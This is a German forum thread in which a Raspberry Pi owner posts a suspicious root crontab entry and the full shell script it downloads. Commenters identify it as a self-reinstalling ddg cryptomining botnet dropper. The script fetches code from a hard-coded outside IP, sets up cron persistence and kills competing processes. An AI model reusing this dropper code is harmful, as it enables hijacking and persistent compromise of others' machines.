Ich wollte etwas zu meiner Root-Crontab-Datei auf meinem Raspberry Pi hinzufügen und habe einen Eintrag gefunden, der mir verdächtig erscheint. Bei der Suche nach Teilen davon bei Google ist nichts aufgetaucht.
Crontab-Eintrag:
*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh
Die Inhalte von http://103.219.112.66:8000/i.shsind:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4
ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -
Mein Linux-Wissen ist begrenzt, aber für mich scheint es nicht üblich zu sein, Binärdateien von einem indonesischen Server herunterzuladen und sie regelmäßig als Root auszuführen.
Was ist das? Was sollte ich tun?
16
Es ist kreisförmig. Alle 15 Minuten wird eine neue Kopie von sich selbst heruntergeladen und installiert. Wenn / wenn die Kopie auf dem Remote-Server geändert wird, führen alle Server, auf denen dieser Cronjob ausgeführt wird, innerhalb von 15 Minuten den neuen Code aus.
—
Wildcard
Ist Ihre Himbeer-Pi offen für das Internet? Was läuft dein Himbeer-Pi? Dies ist das einzige Ergebnis auf Google, wenn ich nach xribfa4 suche. Wenn Sie keine Software ausführen, die dies erfordert, handelt es sich wahrscheinlich um einen Virus.
—
Kemotep
@kemotep diese Zeichenfolge ist zufällig, aber Google für die IP und es gibt ein paar Ergebnisse. Etwas über ein ddg Mining Botnet
—
Frostschutz
Ich habe es gefunden. Es ist verrückt, dass die IP auf einer Website der indonesischen Regierung registriert ist. Es sieht auch so aus, als gäbe es fast 2000 andere IPS, die diese Nutzlast liefern.
—
Kemotep
Das Wichtigste, was Sie wissen müssen, ist, dass Ihr System höchstwahrscheinlich immer noch die Schwachstelle aufweist, die es ermöglicht hat, dass es infiziert wird, selbst wenn Sie diesen crontab-Eintrag entfernen. Sie müssen diese Sicherheitsanfälligkeit finden und beheben.
—
Hans-Martin Mosner